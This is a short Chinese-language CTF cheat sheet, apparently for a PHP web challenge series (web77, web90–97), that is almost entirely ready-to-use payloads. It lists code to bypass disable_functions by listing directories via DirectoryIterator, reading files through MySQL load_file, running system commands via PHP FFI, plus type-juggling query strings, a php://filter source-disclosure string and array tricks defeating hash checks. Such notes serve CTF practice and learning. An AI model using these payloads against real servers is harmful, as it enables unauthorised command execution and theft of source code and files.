命令执行通关playload
实际上是代码执行,用代码读目录和文件内容
参考:https://www.php.net/manual/zh/book.spl.php
以下是绕过disable_funcitons的全通代码,如果要禁用类可以配置disable_classes
读目录
$a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().' ');};
读文件
try {
$dbh = new PDO('mysql:host=localhost;dbname=ctftraining', 'root', 'root');
foreach($dbh->query('select load_file("/var/www/html/index.php")') as $row) {
echo($row[0])."|";
}
$dbh = null;
} catch (PDOException $e) {
echo $e->getMessage();
die();
}
web77
ffi,php7.4才有
$ffi = FFI::cdef("int system(const char *command);");
$ffi->system("whoami");
web90-95
?num=%204476
?cmd=php%0aphp
?num=0x117c
?num=%20010574
?num=4476.0
?num=%20010574
web96
php://filter/convert.base64-encode/resource=flag.php
web97
a[]=a
b[]=b